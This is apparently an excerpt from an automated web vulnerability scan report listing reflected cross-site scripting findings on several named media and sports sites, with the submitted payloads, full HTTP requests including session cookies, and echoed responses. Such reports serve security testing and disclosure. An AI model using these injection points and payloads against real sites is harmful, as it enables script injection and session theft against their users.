2.177. http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcast.net
Path:   /weather/1910374f43--%3E%3Cimg%20src=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84 was submitted in the REST URL parameter 2. This input was echoed as 90356><img src=a onerror=alert(1)>54eae5f6d84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /weather/1910374f43--%3E%3Cimg%20src90356><img%20src%3da%20onerror%3dalert(1)>54eae5f6d84=a%20onerror=alert(document.cookie)%3E935e2e5728f/a/ HTTP/1.1
Host: www.comcast.net
Proxy-Connection: keep-alive
Referer: http://www.comcast.net/weather/1910374f43--%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E935e2e5728f/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnneEkzu4Y4ACqRj; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; xuc=c=2; prefs=pagemsg.state=false; page_counts=4,2; s_lastVisit=11/2010; s_cc=true; s_sq=%5B%5BB%5D%5D; mbox=session#1292781870292-178614#1292784860|PC#1292781870292-178614.20#1293992600|check#true#1292783060; fsr.a=1292782999825

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sun, 19 Dec 2010 18:37:57 GMT
Cache-Control: max-age=300
Expires: Sun, 19 Dec 2010 18:42:57 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 19 Dec 2010 18:37:57 GMT
Connection: close
Content-Length: 37360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
   <meta ht
...[SNIP]...
<img src90356><img src=a onerror=alert(1)>54eae5f6d84=a onerror=alert(document.cookie)>
...[SNIP]...

2.178. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57e8b<script>alert(1)</script>f39eff7e154 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common57e8b<script>alert(1)</script>f39eff7e154/global_flash/player/player.php"</strong>
...[SNIP]...

2.179. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload bd281<script>alert(1)</script>15e0ecd7081 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flashbd281<script>alert(1)</script>15e0ecd7081/player/player.php"</strong>
...[SNIP]...

2.180. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 55ff1<script>alert(1)</script>3b3a53d4fc8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:42 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player55ff1<script>alert(1)</script>3b3a53d4fc8/player.php"</strong>
...[SNIP]...

2.181. http://www.comcastsportsnet.com/common/global_flash/player/player.php [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/global_flash/player/player.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3544c<script>alert(1)</script>c22839dba9c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:43 GMT
Content-Length: 803
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/global_flash/player/player.php3544c<script>alert(1)</script>c22839dba9c"</strong>
...[SNIP]...

2.182. http://www.comcastsportsnet.com/common/js/aggregate.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /common/js/aggregate.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 235bb<script>alert(1)</script>3097e54bcbb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /common/js/235bb<script>alert(1)</script>3097e54bcbb HTTP/1.1
Host: www.comcastsportsnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=98289933.1292783190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=9e2d12a94335acb9f0dd759d7ba5cdcb; __utma=98289933.1376363718.1292783190.1292783190.1292783190.1; __utmc=98289933; __utmb=98289933;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:41 GMT
Content-Length: 776
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/js/235bb<script>alert(1)</script>3097e54bcbb"</strong>
...[SNIP]...

2.183. http://www.comcastsportsnet.com/pages/main [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f3384<script>alert(1)</script>cb66b36a9e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagesf3384<script>alert(1)</script>cb66b36a9e6/main HTTP/1.1
Host: www.comcastsportsnet.com
Proxy-Connection: keep-alive
Referer: http://www.comcastsportsnet.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:38 GMT
Connection: close
Content-Length: 776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/pagesf3384<script>alert(1)</script>cb66b36a9e6/main"</strong>
...[SNIP]...

2.184. http://www.comcastsportsnet.com/pages/main [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.comcastsportsnet.com
Path:   /pages/main

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0707<script>alert(1)</script>573843f4b66 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /pages/mainc0707<script>alert(1)</script>573843f4b66 HTTP/1.1
Host: www.comcastsportsnet.com
Proxy-Connection: keep-alive
Referer: http://www.comcastsportsnet.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:37:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:37:38 GMT
Connection: close
Content-Length: 795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/common/404.html?p=/pages/mainc0707<script>alert(1)</script>573843f4b66"</strong>
...[SNIP]...

2.185. http://www.csnbaltimore.com/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload daf8e<script>alert(1)</script>e5f3917f7f9 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:54 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/01/10/Terps-Hope-Final-Win-Leads-To-Strong-Bow/landing.htmldaf8e<script>alert(1)</script>e5f3917f7f9"</strong>
...[SNIP]...

2.186. http://www.csnbaltimore.com/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 34164<script>alert(1)</script>0648d394dfc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:57 GMT
Content-Length: 816
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/10/10/Anquan-Boldin-the-anti-Derrick-Mason/landing.html34164<script>alert(1)</script>0648d394dfc"</strong>
...[SNIP]...

2.187. http://www.csnbaltimore.com/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 1b173<script>alert(1)</script>8c0b83a496b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:58 GMT
Content-Length: 818
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/11/10/Navy-beats-Army-extends-streak-to-nine/landing.html1b173<script>alert(1)</script>8c0b83a496b"</strong>
...[SNIP]...

2.188. http://www.csnbaltimore.com/12/12/10/Ravens-Texans-The-basics/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/12/10/Ravens-Texans-The-basics/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bb8c0<script>alert(1)</script>2ad29b4003b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:02 GMT
Content-Length: 804
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/12/10/Ravens-Texans-The-basics/landing.htmlbb8c0<script>alert(1)</script>2ad29b4003b"</strong>
...[SNIP]...

2.189. http://www.csnbaltimore.com/12/16/10/Franklin-finally-heads-to-Vandy/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/Franklin-finally-heads-to-Vandy/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 75610<script>alert(1)</script>2b8065799c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:59 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Franklin-finally-heads-to-Vandy/landing.html75610<script>alert(1)</script>2b8065799c8"</strong>
...[SNIP]...

2.190. http://www.csnbaltimore.com/12/16/10/New-sports-arena-for-Baltimore-/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/New-sports-arena-for-Baltimore-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c4947<script>alert(1)</script>b18abeac900 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:30:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:30:58 GMT
Content-Length: 811
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/New-sports-arena-for-Baltimore-/landing.htmlc4947<script>alert(1)</script>b18abeac900"</strong>
...[SNIP]...

2.191. http://www.csnbaltimore.com/12/16/10/Will-Ravens-respond-to-Saints/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/16/10/Will-Ravens-respond-to-Saints/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload a08ac<script>alert(1)</script>3fd554facc0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0 HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:02 GMT
Content-Length: 809
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/16/10/Will-Ravens-respond-to-Saints/landing.htmla08ac<script>alert(1)</script>3fd554facc0"</strong>
...[SNIP]...

2.192. http://www.csnbaltimore.com/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 3db20<script>alert(1)</script>bb2d756dbfb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198586429.1292783240.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=7356005fe40c702710a106680b6ccee6; __utma=198586429.220703256.1292783240.1292783240.1292783240.1; __utmc=198586429; __utmb=198586429.1.10.1292783240;

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html
Expires: Sun, 19 Dec 2010 18:31:04 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 19 Dec 2010 18:31:04 GMT
Content-Length: 820
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<strong>"/12/17/10/Brady-Hoke-talks-about-prepping-to-face-/landing.html3db20<script>alert(1)</script>bb2d756dbfb"</strong>
...[SNIP]...

2.193. http://www.csnbaltimore.com/12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csnbaltimore.com
Path:   /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 77970<script>alert(1)</script>52d6f2862ce was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /12/17/10/Cliff-Lee-quartet-no-match-for-1971-Orio/landing.html77970<script>alert(1)</script>52d6f2862ce HTTP/1.1
Host: www.csnbaltimore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
